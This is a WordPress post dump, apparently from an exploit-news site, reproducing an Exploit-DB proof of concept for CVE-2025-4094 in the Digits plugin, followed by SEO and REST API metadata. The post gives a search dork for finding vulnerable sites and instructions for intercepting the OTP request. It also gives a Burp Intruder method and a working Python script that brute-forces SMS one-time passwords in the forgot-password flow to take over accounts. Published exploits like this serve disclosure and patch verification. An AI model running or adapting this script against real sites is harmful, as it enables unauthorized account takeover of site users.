\n# Exploit Title: WordPress Digits Plugin 8.4.6.1 – Authentication Bypass via OTP Bruteforcing
\n
# Google Dork: inurl:\/wp-content\/plugins\/digits\/
\n
# Date: 2025-04-30
\n
# Exploit Author: Saleh Tarawneh
\n
# Vendor Homepage: https:\/\/digits.unitedover.com\/
\n
# Version: < 8.4.6.1\n
# CVE : CVE-2025-4094<\/p>\n
“””
\n
The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting.
\n
An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values.<\/p>\n
This PoC targets the “Forgot Password” flow and automates the attack, which is the same concept that is valid for the registration flow.<\/p>\n
CWE-287: Improper Authentication
\n
CVSS v3.1: 9.8 (Critical)
\n
OWASP A2: Broken Authentication<\/p>\n
[Instructions]
\n
1. Use a tool like Burp Suite or your browser\u2019s developer tools to intercept the OTP verification request.
\n
2. Copy the exact request parameters
\n
3. Replace the placeholder values in the script with real data from the intercepted request.
\n
4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.<\/p>\n
[Alternative Method \u2013 Burp Suite Pro]<\/p>\n
If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:<\/p>\n
1. Intercept the OTP request using Burp Proxy.
\n
2. Send the request to Intruder.
\n
3. Mark the `sms_otp` parameter as the payload position.
\n
4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).
\n
5. Start the attack and monitor responses for a different status code, length, or success message.<\/p>\n
“””<\/p>\n
import requests<\/p>\n
def brute(otp):
\n
url = “https:\/\/example.com\/wp-admin\/admin-ajax.php”
\n
data = { # Replace with targets data
\n
“login_digt_countrycode”: “+”,
\n
“digits_phone”: “000000000”,
\n
“action_type”: “phone”,
\n
“sms_otp”: otp,
\n
“otp_step_1”: “1”,
\n
“instance_id”: “xxxxxxx”,
\n
“action”: “digits_forms_ajax”,
\n
“type”: “forgot”,
\n
“forgot_pass_method”: “sms_otp”,
\n
“digits”: “1”,
\n
“digits_redirect_page”: “\/\/example.com\/”,
\n
“digits_form”: “xxxxxxxx”,
\n
“_wp_http_referer”: “\/?login=true”
\n
}
\n
headers = {
\n
“User-Agent”: “Mozilla\/5.0”,
\n
“Content-Type”: “application\/x-www-form-urlencoded; charset=UTF-8”,
\n
“X-Requested-With”: “XMLHttpRequest”,
\n
“Referer”: “https:\/\/example.com\/?login=true” # Replace with intercepted referer
\n
}
\n
response = requests.post(url, data=data, headers=headers)
\n
if ‘”success”:true’ in response.text:
\n
print(f”[+] OTP FOUND: {otp}”)
\n
exit()<\/p>\n
def main():
\n
for otp in range(0, 10000): # range(0, 1000000): for 6-digit
\n
otp_str = f”{otp:04d}” # {otp:06d} for 6-digit
\n
print(f”[*] Trying OTP: {otp_str}”)
\n
brute(otp_str)<\/p>\n
if __name__ == “__main__”:
\n
main()\n<\/div>\n
View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Exploit Details Basic Information Exploit Title WordPress Digits Plugin 8.4.6.1 – Authentication Bypass via OTP Bruteforcing Exploit ID EDB-ID:52307 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-6084","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n
WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=6084\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title WordPress Digits Plugin 8.4.6.1 – Authentication Bypass via OTP Bruteforcing Exploit ID EDB-ID:52307 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=6084\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-29T05:34:37+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"WordPress Digits Plugin 8.4.6.1 – Authentication Bypass via OTP Bruteforcing\",\"datePublished\":\"2025-05-29T05:34:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\"},\"wordCount\":432,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6084#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\",\"name\":\"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-29T05:34:37+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6084\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6084#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress Digits Plugin 8.4.6.1 – Authentication Bypass via OTP Bruteforcing\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=6084","og_locale":"en_US","og_type":"article","og_title":"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem","og_description":"Exploit Details Basic Information Exploit Title WordPress Digits Plugin 8.4.6.1 – Authentication Bypass via OTP Bruteforcing Exploit ID EDB-ID:52307 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00...","og_url":"https:\/\/zero.redgem.net\/?p=6084","og_site_name":"zero redgem","article_published_time":"2025-05-29T05:34:37+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=6084#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=6084"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"WordPress Digits Plugin 8.4.6.1 – Authentication Bypass via OTP Bruteforcing","datePublished":"2025-05-29T05:34:37+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=6084"},"wordCount":432,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=6084#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=6084","url":"https:\/\/zero.redgem.net\/?p=6084","name":"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-29T05:34:37+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=6084#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=6084"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=6084#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"WordPress Digits Plugin 8.4.6.1 – Authentication Bypass via OTP Bruteforcing"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6084","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6084"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6084\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6084"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6084"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6084"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}